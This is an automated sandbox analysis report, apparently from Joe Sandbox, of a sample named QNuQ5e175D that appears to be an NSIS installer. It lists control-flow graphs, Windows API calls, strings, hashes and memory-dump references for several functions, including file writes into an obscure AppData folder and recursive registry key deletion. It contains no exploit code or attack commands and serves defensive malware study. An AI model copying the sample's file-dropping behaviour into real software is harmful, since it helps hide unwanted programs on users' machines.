                                                          control_flow_graph 735 4065b4-4065bd 736 4065d0-4065ea 735->736 737 4065bf-4065ce 735->737 738 4065f0-4065fc 736->738 739 4067fa-406800 736->739 737->736 738->739 740 406602-406609 738->740 741 406806-406813 739->741 742 40660e-40661b 739->742 740->739 744 406815-40681a call 406577 741->744 745 40681f-406822 741->745 742->741 743 406621-40662a 742->743 746 406630-406673 743->746 747 4067e7 743->747 744->745 751 406679-406685 746->751 752 40678b-40678f 746->752 749 4067f5-4067f8 747->749 750 4067e9-4067f3 747->750 749->739 750->739 753 406687 751->753 754 40668f-406691 751->754 755 406791-406798 752->755 756 4067c3-4067c7 752->756 753->754 761 406693-4066b1 call 406445 754->761 762 4066cb-4066ce 754->762 759 4067a8-4067b4 call 406577 755->759 760 40679a-4067a6 call 4064be 755->760 757 4067d7-4067e5 lstrlenW 756->757 758 4067c9-4067d2 call 4065b4 756->758 757->739 758->757 774 4067b9-4067bf 759->774 760->774 773 4066b6-4066b9 761->773 763 4066d0-4066dc GetSystemDirectoryW 762->763 764 4066e1-4066e4 762->764 769 40676e-406771 763->769 770 4066f6-4066fa 764->770 771 4066e6-4066f2 GetWindowsDirectoryW 764->771 775 406783-406789 call 406825 769->775 776 406773-406776 769->776 770->769 777 4066fc-40671a 770->777 771->770 773->776 778 4066bf-4066c6 call 4065b4 773->778 774->757 779 4067c1 774->779 775->757 776->775 780 406778-40677e lstrcatW 776->780 782 40671c-406722 777->782 783 40672e-406746 call 40696b 777->783 778->769 779->775 780->775 788 40672a-40672c 782->788 792 406748-40675b SHGetPathFromIDListW CoTaskMemFree 783->792 793 40675d-406766 783->793 788->783 790 406768-40676c 788->790 790->769 792->790 792->793 793->777 793->790
                                                          APIs
                                                          • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 004066D6
                                                          • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp\System.dll,?,?,00000000,00000000,00425A20,74DF23A0), ref: 004066EC
                                                          • SHGetPathFromIDListW.SHELL32(00000000,Call), ref: 0040674A
                                                          • CoTaskMemFree.OLE32(00000000,?,00000000,00000007), ref: 00406753
                                                          • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp\System.dll,?,?,00000000,00000000,00425A20,74DF23A0), ref: 0040677E
                                                          • lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp\System.dll,?,?,00000000,00000000,00425A20,74DF23A0), ref: 004067D8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: Directory$FreeFromListPathSystemTaskWindowslstrcatlstrlen
                                                          • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                          • API String ID: 4024019347-2806867668
                                                          • Opcode ID: 2066e1c471d7490a15c1c198898eb18b068b97d6eda6cad4e7272ae8e9db0920
                                                          • Instruction ID: fc4c1bf1ff31ba1b34cdfc75387d7881e57296f2874843d1a5ebc397bafcf832
                                                          • Opcode Fuzzy Hash: 2066e1c471d7490a15c1c198898eb18b068b97d6eda6cad4e7272ae8e9db0920
                                                          • Instruction Fuzzy Hash: D16135716042009BD720AF24DD80B6B76E8EF85328F12453FF647B32D0DB7D9961865E
                                                          Function 004032D9 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 166COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 794 4032d9-4032f0 795 4032f2 794->795 796 4032f9-403302 794->796 795->796 797 403304 796->797 798 40330b-403310 796->798 797->798 799 403320-40332d call 4034f4 798->799 800 403312-40331b call 40350a 798->800 804 4034e2 799->804 805 403333-403337 799->805 800->799 806 4034e4-4034e5 804->806 807 40348d-40348f 805->807 808 40333d-403386 GetTickCount 805->808 809 4034ed-4034f1 806->809 812 403491-403494 807->812 813 4034cf-4034d2 807->813 810 4034ea 808->810 811 40338c-403394 808->811 810->809 815 403396 811->815 816 403399-4033a7 call 4034f4 811->816 812->810 814 403496 812->814 817 4034d4 813->817 818 4034d7-4034e0 call 4034f4 813->818 819 403499-40349f 814->819 815->816 816->804 828 4033ad-4033b6 816->828 817->818 818->804 826 4034e7 818->826 822 4034a1 819->822 823 4034a3-4034b1 call 4034f4 819->823 822->823 823->804 831 4034b3-4034bf call 406119 823->831 826->810 830 4033bc-4033dc call 406ac6 828->830 836 4033e2-4033f5 GetTickCount 830->836 837 403485-403487 830->837 838 4034c1-4034cb 831->838 839 403489-40348b 831->839 840 403440-403442 836->840 841 4033f7-4033ff 836->841 837->806 838->819 844 4034cd 838->844 839->806 842 403444-403448 840->842 843 403479-40347d 840->843 845 403401-403405 841->845 846 403407-403438 MulDiv wsprintfW call 4055fc 841->846 847 40344a-403451 call 406119 842->847 848 40345f-40346a 842->848 843->811 849 403483 843->849 844->810 845->840 845->846 851 40343d 846->851 854 403456-403458 847->854 853 40346d-403471 848->853 849->810 851->840 853->830 855 403477 853->855 854->839 856 40345a-40345d 854->856 855->810 856->853
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: CountTick$wsprintf
                                                          • String ID: *B$ ZB$ A$ A$... %d%%
                                                          • API String ID: 551687249-3856725213
                                                          • Opcode ID: 4d79547acdf73e44e2915cc23a34bb29038fe19ea0f8e502eb24a445e2a4333a
                                                          • Instruction ID: 3a086bfa1ae904988031f2e91e2ff9394e13111a018eeb379290de00703e2b75
                                                          • Opcode Fuzzy Hash: 4d79547acdf73e44e2915cc23a34bb29038fe19ea0f8e502eb24a445e2a4333a
                                                          • Instruction Fuzzy Hash: 2F519F71900219DBCB11DF65DA44B9E7FB8AF44766F10413BE810BB2D1C7789A40CBA9
                                                          Function 00401794 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145stringtimeCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 857 401794-4017b9 call 402dcb call 405ebd 862 4017c3-4017d5 call 406577 call 405e46 lstrcatW 857->862 863 4017bb-4017c1 call 406577 857->863 868 4017da-4017db call 406825 862->868 863->868 872 4017e0-4017e4 868->872 873 4017e6-4017f0 call 4068d4 872->873 874 401817-40181a 872->874 881 401802-401814 873->881 882 4017f2-401800 CompareFileTime 873->882 876 401822-40183e call 406067 874->876 877 40181c-40181d call 406042 874->877 884 401840-401843 876->884 885 4018b2-4018db call 4055fc call 4032d9 876->885 877->876 881->874 882->881 887 401894-40189e call 4055fc 884->887 888 401845-401883 call 406577 * 2 call 4065b4 call 406577 call 405bd7 884->888 898 4018e3-4018ef SetFileTime 885->898 899 4018dd-4018e1 885->899 900 4018a7-4018ad 887->900 888->872 921 401889-40188a 888->921 902 4018f5-401900 CloseHandle 898->902 899->898 899->902 903 402c58 900->903 905 401906-401909 902->905 906 402c4f-402c52 902->906 907 402c5a-402c5e 903->907 909 40190b-40191c call 4065b4 lstrcatW 905->909 910 40191e-401921 call 4065b4 905->910 906->903 916 401926-4023bd 909->916 910->916 919 4023c2-4023c7 916->919 920 4023bd call 405bd7 916->920 919->907 920->919 921->900 922 40188c-40188d 921->922 922->887
                                                          APIs
                                                          • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Local\skattekode\Rygtets222\overstadigeres,?,?,00000031), ref: 004017D5
                                                          • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\skattekode\Rygtets222\overstadigeres,?,?,00000031), ref: 004017FA
                                                            • Part of subcall function 00406577: lstrcpynW.KERNEL32(?,?,00000400,004036C4,00433700,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406584
                                                            • Part of subcall function 004055FC: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp\System.dll,00000000,00425A20,74DF23A0,?,?,?,?,?,?,?,?,?,0040343D,00000000,?), ref: 00405634
                                                            • Part of subcall function 004055FC: lstrlenW.KERNEL32(0040343D,Skipped: C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp\System.dll,00000000,00425A20,74DF23A0,?,?,?,?,?,?,?,?,?,0040343D,00000000), ref: 00405644
                                                            • Part of subcall function 004055FC: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp\System.dll,0040343D,0040343D,Skipped: C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp\System.dll,00000000,00425A20,74DF23A0), ref: 00405657
                                                            • Part of subcall function 004055FC: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp\System.dll), ref: 00405669
                                                            • Part of subcall function 004055FC: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040568F
                                                            • Part of subcall function 004055FC: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004056A9
                                                            • Part of subcall function 004055FC: SendMessageW.USER32(?,00001013,?,00000000), ref: 004056B7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                          • String ID: C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp$C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp\System.dll$C:\Users\user\AppData\Local\skattekode\Rygtets222\overstadigeres$Call
                                                          • API String ID: 1941528284-3388506212
                                                          • Opcode ID: 92f8b93885e00e2238c8143a7be30e505a2fe7597e0250fcbd3cd8e0f990a4c4
                                                          • Instruction ID: 896c0c78208a39cbb5dd39340d0745d1a2bf2ace5f7797069eceb710e9101d93
                                                          • Opcode Fuzzy Hash: 92f8b93885e00e2238c8143a7be30e505a2fe7597e0250fcbd3cd8e0f990a4c4
                                                          • Instruction Fuzzy Hash: 4C41B671900108BACB117BB5DD85DBE7AB9EF45328F21423FF412B10E2D73C8A919A2D
                                                          Function 004055FC Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72stringwindowCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 923 4055fc-405611 924 405617-405628 923->924 925 4056c8-4056cc 923->925 926 405633-40563f lstrlenW 924->926 927 40562a-40562e call 4065b4 924->927 929 405641-405651 lstrlenW 926->929 930 40565c-405660 926->930 927->926 929->925 931 405653-405657 lstrcatW 929->931 932 405662-405669 SetWindowTextW 930->932 933 40566f-405673 930->933 931->930 932->933 934 405675-4056b7 SendMessageW * 3 933->934 935 4056b9-4056bb 933->935 934->935 935->925 936 4056bd-4056c0 935->936 936->925
                                                          APIs
                                                          • lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp\System.dll,00000000,00425A20,74DF23A0,?,?,?,?,?,?,?,?,?,0040343D,00000000,?), ref: 00405634
                                                          • lstrlenW.KERNEL32(0040343D,Skipped: C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp\System.dll,00000000,00425A20,74DF23A0,?,?,?,?,?,?,?,?,?,0040343D,00000000), ref: 00405644
                                                          • lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp\System.dll,0040343D,0040343D,Skipped: C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp\System.dll,00000000,00425A20,74DF23A0), ref: 00405657
                                                          • SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp\System.dll), ref: 00405669
                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040568F
                                                          • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004056A9
                                                          • SendMessageW.USER32(?,00001013,?,00000000), ref: 004056B7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                          • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp\System.dll
                                                          • API String ID: 2531174081-1249951325
                                                          • Opcode ID: 7a9b63bfacfea3e7ee08c26d0c930c27eafc8712a75251909ef17a9a102c325c
                                                          • Instruction ID: 60923f6e922cea494a698f26c75bee70e53a21f42b4b77269416c2a585f1ce57
                                                          • Opcode Fuzzy Hash: 7a9b63bfacfea3e7ee08c26d0c930c27eafc8712a75251909ef17a9a102c325c
                                                          • Instruction Fuzzy Hash: 9A21A171900258BACB119FA5ED449DFBFB4EF45310F50843AF908B22A0C3794A40CFA8
                                                          Function 00402711 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 937 402711-40272a call 402da9 940 402730-402737 937->940 941 402c4f-402c52 937->941 943 402739 940->943 944 40273c-40273f 940->944 942 402c58-402c5e 941->942 943->944 945 4028a3-4028ab 944->945 946 402745-402754 call 4064d7 944->946 945->941 946->945 950 40275a 946->950 951 402760-402764 950->951 952 4027f9-4027fc 951->952 953 40276a-402785 ReadFile 951->953 955 402814-402824 call 4060ea 952->955 956 4027fe-402801 952->956 953->945 954 40278b-402790 953->954 954->945 958 402796-4027a4 954->958 955->945 965 402826 955->965 956->955 959 402803-40280e call 406148 956->959 962 4027aa-4027bc MultiByteToWideChar 958->962 963 40285f-40286b call 4064be 958->963 959->945 959->955 962->965 966 4027be-4027c1 962->966 963->942 968 402829-40282c 965->968 969 4027c3-4027ce 966->969 968->963 971 40282e-402833 968->971 969->968 972 4027d0-4027f5 SetFilePointer MultiByteToWideChar 969->972 973 402870-402874 971->973 974 402835-40283a 971->974 972->969 975 4027f7 972->975 976 402891-40289d SetFilePointer 973->976 977 402876-40287a 973->977 974->973 978 40283c-40284f 974->978 975->965 976->945 979 402882-40288f 977->979 980 40287c-402880 977->980 978->945 981 402851-402857 978->981 979->945 980->976 980->979 981->951 982 40285d 981->982 982->945
                                                          APIs
                                                          • ReadFile.KERNELBASE(?,?,?,?), ref: 0040277D
                                                          • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004027B8
                                                          • SetFilePointer.KERNELBASE(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027DB
                                                          • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027F1
                                                            • Part of subcall function 00406148: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 0040615E
                                                          • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040289D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: File$Pointer$ByteCharMultiWide$Read
                                                          • String ID: 9
                                                          • API String ID: 163830602-2366072709
                                                          • Opcode ID: e6852b5c5fbfd8bc876860f3b14f1bcaed0b753dd9a04d4db6e12186382bd870
                                                          • Instruction ID: d1aefac9689752b6b3ea6a4f87dd4281ecbe68d6f3974aa7f4e2ef829afcd0bd
                                                          • Opcode Fuzzy Hash: e6852b5c5fbfd8bc876860f3b14f1bcaed0b753dd9a04d4db6e12186382bd870
                                                          • Instruction Fuzzy Hash: 66510C75D04119AADF20EFD4CA85AAEBBB9FF44304F14817BE501B62D0D7B89D828B58
                                                          Function 004068FB Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 36libraryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 983 4068fb-40691b GetSystemDirectoryW 984 40691d 983->984 985 40691f-406921 983->985 984->985 986 406932-406934 985->986 987 406923-40692c 985->987 989 406935-406968 wsprintfW LoadLibraryExW 986->989 987->986 988 40692e-406930 987->988 988->989
                                                          APIs
                                                          • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406912
                                                          • wsprintfW.USER32 ref: 0040694D
                                                          • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406961
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: DirectoryLibraryLoadSystemwsprintf
                                                          • String ID: %s%S.dll$UXTHEME
                                                          • API String ID: 2200240437-1106614640
                                                          • Opcode ID: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
                                                          • Instruction ID: 6d7bab0cfc2d48cbbbe6bb2f91b005b1c0391479526b60628745523d5c0137a7
                                                          • Opcode Fuzzy Hash: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
                                                          • Instruction Fuzzy Hash: 66F02B71501129A7CF10AB68DD0EF9F376CAB00304F10447AA646F10E0EB7CDB69CB98
                                                          Function 00402ECE Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 990 402ece-402ef7 call 4063e4 992 402efc-402f00 990->992 993 402fb1-402fb5 992->993 994 402f06-402f0a 992->994 995 402f0c-402f2d RegEnumValueW 994->995 996 402f2f-402f42 994->996 995->996 997 402f96-402fa4 RegCloseKey 995->997 998 402f6b-402f72 RegEnumKeyW 996->998 997->993 999 402f44-402f46 998->999 1000 402f74-402f86 RegCloseKey call 40696b 998->1000 999->997 1002 402f48-402f5c call 402ece 999->1002 1006 402fa6-402fac 1000->1006 1007 402f88-402f94 RegDeleteKeyW 1000->1007 1002->1000 1008 402f5e-402f6a 1002->1008 1006->993 1007->993 1008->998
                                                          APIs
                                                          • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402F22
                                                          • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F6E
                                                          • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F77
                                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F8E
                                                          • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F99
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: CloseEnum$DeleteValue
                                                          • String ID:
                                                          • API String ID: 1354259210-0
                                                          • Opcode ID: 2404979ab5d72bd1f47e4c5d2100d154d2dcf156ce7fec90999c2a50aae3b712
                                                          • Instruction ID: 446d876c474c9d83549856ad9cac23e68bb7371358ae7480bd0e7fa7c4692e5e
                                                          • Opcode Fuzzy Hash: 2404979ab5d72bd1f47e4c5d2100d154d2dcf156ce7fec90999c2a50aae3b712
                                                          • Instruction Fuzzy Hash: 1D212A7150010ABFDF129F90CE89EEF7A7DEB54388F110076B909B21E0E7B58E54AA64
                                                          Function 6FC41817 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1009 6fc41817-6fc41856 call 6fc41bff 1013 6fc41976-6fc41978 1009->1013 1014 6fc4185c-6fc41860 1009->1014 1015 6fc41862-6fc41868 call 6fc4243e 1014->1015 1016 6fc41869-6fc41876 call 6fc42480 1014->1016 1015->1016 1021 6fc418a6-6fc418ad 1016->1021 1022 6fc41878-6fc4187d 1016->1022 1023 6fc418cd-6fc418d1 1021->1023 1024 6fc418af-6fc418cb call 6fc42655 call 6fc41654 call 6fc41312 GlobalFree 1021->1024 1025 6fc4187f-6fc41880 1022->1025 1026 6fc41898-6fc4189b 1022->1026 1030 6fc418d3-6fc4191c call 6fc41666 call 6fc42655 1023->1030 1031 6fc4191e-6fc41924 call 6fc42655 1023->1031 1047 6fc41925-6fc41929 1024->1047 1028 6fc41882-6fc41883 1025->1028 1029 6fc41888-6fc41889 call 6fc42b98 1025->1029 1026->1021 1032 6fc4189d-6fc4189e call 6fc42e23 1026->1032 1036 6fc41885-6fc41886 1028->1036 1037 6fc41890-6fc41896 call 6fc42810 1028->1037 1043 6fc4188e 1029->1043 1030->1047 1031->1047 1040 6fc418a3 1032->1040 1036->1021 1036->1029 1046 6fc418a5 1037->1046 1040->1046 1043->1040 1046->1021 1052 6fc41966-6fc4196d 1047->1052 1053 6fc4192b-6fc41939 call 6fc42618 1047->1053 1052->1013 1055 6fc4196f-6fc41970 GlobalFree 1052->1055 1059 6fc41951-6fc41958 1053->1059 1060 6fc4193b-6fc4193e 1053->1060 1055->1013 1059->1052 1062 6fc4195a-6fc41965 call 6fc415dd 1059->1062 1060->1059 1061 6fc41940-6fc41948 1060->1061 1061->1059 1063 6fc4194a-6fc4194b FreeLibrary 1061->1063 1062->1052 1063->1059
                                                          APIs
                                                            • Part of subcall function 6FC41BFF: GlobalFree.KERNEL32(?), ref: 6FC41E74
                                                            • Part of subcall function 6FC41BFF: GlobalFree.KERNEL32(?), ref: 6FC41E79
                                                            • Part of subcall function 6FC41BFF: GlobalFree.KERNEL32(?), ref: 6FC41E7E
